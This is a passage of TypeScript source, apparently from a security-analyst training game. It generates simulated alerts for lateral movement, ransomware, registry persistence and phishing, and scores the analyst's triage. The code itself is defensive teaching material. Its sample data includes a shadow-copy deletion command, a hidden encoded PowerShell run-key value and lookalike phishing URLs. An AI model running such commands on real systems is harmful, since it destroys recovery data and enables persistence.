      let explanation: string;

      if (isMalicious) {
        correctAction = 'escalate';
        explanation = `${method} used to execute suspicious command on remote host - attacker moving laterally. Check source host (${source.ip}) for compromise.`;
      } else if (isFromJumpbox && !isMalicious) {
        correctAction = 'tune';
        explanation = `Remote execution from known jumpbox/admin workstation. Tune if this is a standard admin pattern.`;
      } else {
        correctAction = 'investigate';
        explanation = `Remote execution between internal hosts - verify with ${user} this was intentional admin activity.`;
      }

      return {
        severity: isMalicious ? 'HIGH' : ('MEDIUM' as Severity),
        summary: `${method} from ${source.ip} to ${target.hostname}`,
        details: {
          Method: method,
          Source: source.ip,
          Target: target.hostname,
          Command: command.length > 40 ? command.slice(0, 40) + '...' : command,
          User: user,
        },
        context: {
          source,
          target,
          relatedAlerts: isMalicious
            ? [
                {
                  id: 'rel-lat',
                  title: 'Failed logins on source host',
                  time: formatTime(30),
                  severity: 'MEDIUM',
                },
              ]
            : [],
          baselineNote:
            isFromJumpbox && !isMalicious
              ? `${source.ip} is an authorized jumpbox for admin access`
              : undefined,
        },
        correctAction,
        explanation,
        isTruePositive: isMalicious,
        mitreTechnique: 'T1570 - Lateral Tool Transfer',
      };
    },
  },

  // Ransomware Indicators
  {
    id: 'ransomware-indicator',
    title: 'Ransomware behavior detected',
    category: 'malware',
    generate: (rng, difficulty) => {
      const target = generateTargetContext(
        rng,
        rng.pick<AssetRole>(['workstation', 'backup', 'db'])
      );
      const isMalicious = rng.chance(difficulty === 'intern' ? 0.75 : 0.5);

      const maliciousIndicators = [
        {
          behavior: 'Mass file encryption',
          detail: '500+ files renamed to .encrypted in 2 min',
        },
        {
          behavior: 'Shadow copy deletion',
          detail: 'vssadmin delete shadows /all /quiet',
        },
        {
          behavior: 'Ransom note dropped',
          detail: 'README_RESTORE.txt created in multiple directories',
        },
      ];
      const benignIndicators = [
        { behavior: 'Legitimate encryption', detail: 'BitLocker enabling on volume' },
        { behavior: 'Backup operation', detail: 'VSS snapshot creation for backup' },
        { behavior: 'Archive creation', detail: '7zip creating encrypted archive' },
      ];

      const indicator = isMalicious
        ? rng.pick(maliciousIndicators)
        : rng.pick(benignIndicators);

      let correctAction: Action;
      let explanation: string;

      if (isMalicious) {
        correctAction = 'escalate';
        explanation = `CRITICAL: ${indicator.behavior} - active ransomware attack. Isolate host immediately, do NOT shut down (preserve memory for forensics).`;
      } else if (indicator.behavior.includes('BitLocker')) {
        correctAction = 'dismiss';
        explanation = `BitLocker is enterprise disk encryption - this is IT policy enforcement, not ransomware.`;
      } else {
        correctAction = 'investigate';
        explanation = `Encryption-related activity from backup/archive tool - verify this is authorized before dismissing.`;
      }

      return {
        severity: isMalicious ? 'CRITICAL' : ('MEDIUM' as Severity),
        summary: `${indicator.behavior} on ${target.hostname}`,
        details: {
          Behavior: indicator.behavior,
          Detail: indicator.detail,
          Host: target.hostname,
          'Files affected': isMalicious ? rng.nextInt(100, 10000) : 'N/A',
        },
        context: {
          source: {
            ip: target.ip,
            type: 'internal',
            isKnownBad: isMalicious,
            isKnownGood: !isMalicious,
          },
          target,
          relatedAlerts: isMalicious
            ? [
                {
                  id: 'rel-ransom1',
                  title: 'Suspicious process execution',
                  time: formatTime(5),
                  severity: 'HIGH',
                },
                {
                  id: 'rel-ransom2',
                  title: 'AV disabled',
                  time: formatTime(8),
                  severity: 'HIGH',
                },
              ]
            : [],
          baselineNote: !isMalicious
            ? `IT runs weekly BitLocker compliance checks`
            : undefined,
          threatIntelNote: isMalicious
            ? `Behavior matches LockBit/BlackCat ransomware TTPs`
            : undefined,
        },
        correctAction,
        explanation,
        isTruePositive: isMalicious,
        mitreTechnique: 'T1486 - Data Encrypted for Impact',
      };
    },
  },

  // Registry Persistence
  {
    id: 'persistence-registry',
    title: 'Registry run key modified',
    category: 'lateral-movement',
    generate: (rng, difficulty) => {
      const target = generateTargetContext(
        rng,
        rng.pick<AssetRole>(['workstation', 'admin'])
      );
      const isMalicious = rng.chance(difficulty === 'intern' ? 0.6 : 0.4);
      const user = rng.pick(ADMIN_USERS);

      const maliciousPaths = [
        'C:\\Users\\Public\\update.exe',
        'C:\\Windows\\Temp\\svchost.exe',
        'powershell -windowstyle hidden -enc <base64>',
      ];
      const benignPaths = [
        'C:\\Program Files\\Zoom\\Zoom.exe',
        'C:\\Program Files (x86)\\Microsoft\\Teams\\current\\Teams.exe',
        'C:\\Program Files\\Dropbox\\Client\\Dropbox.exe',
      ];

      const value = isMalicious ? rng.pick(maliciousPaths) : rng.pick(benignPaths);
      const keyPath = `HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`;

      let correctAction: Action;
      let explanation: string;

      if (isMalicious) {
        correctAction = 'escalate';
        explanation = `Run key points to suspicious location (${value.includes('Public') ? 'Public folder' : value.includes('Temp') ? 'Temp folder' : 'hidden PowerShell'}). Classic persistence for malware.`;
      } else {
        correctAction = 'tune';
        explanation = `Known application adding itself to startup. Common for chat/collaboration apps - tune to reduce noise.`;
      }

      return {
        severity: isMalicious ? 'HIGH' : ('LOW' as Severity),
        summary: `Registry run key modified on ${target.hostname}`,
        details: {
          Key: keyPath,
          Value: value.length > 50 ? value.slice(0, 50) + '...' : value,
          'Modified by': user,
          Timestamp: formatTime(rng.nextInt(1, 10)),
        },
        context: {
          source: {
            ip: target.ip,
            type: 'internal',
            isKnownBad: isMalicious,
            isKnownGood: !isMalicious,
          },
          target,
          relatedAlerts: isMalicious
            ? [
                {
                  id: 'rel-reg',
                  title: 'Unknown process created',
                  time: formatTime(12),
                  severity: 'MEDIUM',
                },
              ]
            : [],
          baselineNote: !isMalicious
            ? `Software auto-start entries are common for productivity apps`
            : undefined,
        },
        correctAction,
        explanation,
        isTruePositive: isMalicious,
        mitreTechnique:
          'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys',
      };
    },
  },

  // Phishing Email Clicked
  {
    id: 'phishing-click',
    title: 'Phishing link clicked',
    category: 'lateral-movement',
    generate: (rng, difficulty) => {
      const target = generateTargetContext(rng, 'workstation');
      const isCompromise = rng.chance(difficulty === 'intern' ? 0.6 : 0.4);
      const user = rng.pick(ADMIN_USERS);

      const maliciousUrls = [
        'http://login-microsoft365.com/auth',
        'https://sharepoint-docs.xyz/invoice.docx',
        'http://onedrive-share.top/file/download',
      ];
      const simulationUrls = [
        'https://knowbe4-training.com/phish-test',
        'https://security-awareness.company.com/test',
      ];

      const url = isCompromise ? rng.pick(maliciousUrls) : rng.pick(simulationUrls);
      const credentialsEntered = isCompromise && rng.chance(0.6);
      const downloadExecuted = isCompromise && !credentialsEntered && rng.chance(0.5);

      let correctAction: Action;
      let explanation: string;

      if (isCompromise && credentialsEntered) {
        correctAction = 'escalate';
        explanation = `User entered credentials on phishing page - account potentially compromised. Force password reset and check for unauthorized access.`;
      } else if (isCompromise && downloadExecuted) {
        correctAction = 'escalate';
        explanation = `Malicious download executed after phishing click. Isolate workstation and investigate for malware.`;
      } else if (isCompromise) {
        correctAction = 'investigate';
        explanation = `User clicked phishing link but no credentials entered or downloads. Brief user and monitor for follow-up activity.`;
      } else {
        correctAction = 'dismiss';
        explanation = `Security awareness training simulation - ${user} clicked but this is a test. No action needed, training team will follow up.`;
      }

      return {
        severity:
          credentialsEntered || downloadExecuted
            ? 'CRITICAL'
            : isCompromise
              ? 'HIGH'
              : ('LOW' as Severity),
        summary: `User ${user} clicked suspicious link${credentialsEntered ? ' and entered credentials' : ''}`,
        details: {
          User: user,
          URL: url,
          'Credentials entered': credentialsEntered ? 'Yes' : 'No',
          'Download executed': downloadExecuted ? 'Yes' : 'No',
          'Email subject': isCompromise
            ? 'Urgent: Your account will be suspended'
            : 'Security Training Test',
        },
        context: {
          source: {
            ip: target.ip,
            type: 'internal',
            isKnownBad: false,
            isKnownGood: true,
          },
          target,
          relatedAlerts: isCompromise
            ? [
                {
                  id: 'rel-phish',
                  title: 'Suspicious email received',
                  time: formatTime(15),
                  severity: 'MEDIUM',
                },
              ]
            : [],
          baselineNote: !isCompromise
            ? 'Monthly phishing simulations are conducted by Security team'
            : undefined,
          threatIntelNote: isCompromise
            ? 'Domain registered 24 hours ago, hosting credential harvester'
            : undefined,
        },
        correctAction,
        explanation,
        isTruePositive: isCompromise,
        mitreTechnique: 'T1566.002 - Phishing: Spearphishing Link',
      };
    },
  },
];

// Attack Chain Definitions - coordinated multi-stage attacks
export const ATTACK_CHAINS: AttackChainDefinition[] = [
  {
    id: 'chain-ransomware',
    name: 'Ransomware Deployment',
    phases: ['initial-access', 'execution', 'persistence', 'lateral-movement', 'exfil'],
    templateIds: [
      'phishing-click',
      'powershell-exec',
      'persistence-schtask',
      'lateral-psexec',
      'ransomware-indicator',
    ],
  },
  {
    id: 'chain-apt',
    name: 'APT Intrusion',
    phases: ['recon', 'initial-access', 'priv-esc', 'lateral-movement', 'exfil'],
    templateIds: [
      'internal-scan',
      'ssh-brute-force',
      'credential-dump',
      'lateral-psexec',
      'data-exfil',
    ],
  },
  {
    id: 'chain-insider',
    name: 'Insider Data Theft',
    phases: ['recon', 'priv-esc', 'exfil'],
    templateIds: ['internal-scan', 'priv-esc', 'dns-tunneling'],
  },
  {
    id: 'chain-cryptominer',
    name: 'Cryptominer Deployment',
    phases: ['initial-access', 'execution', 'persistence'],
    templateIds: ['ssh-brute-force', 'powershell-exec', 'persistence-registry'],
  },
];
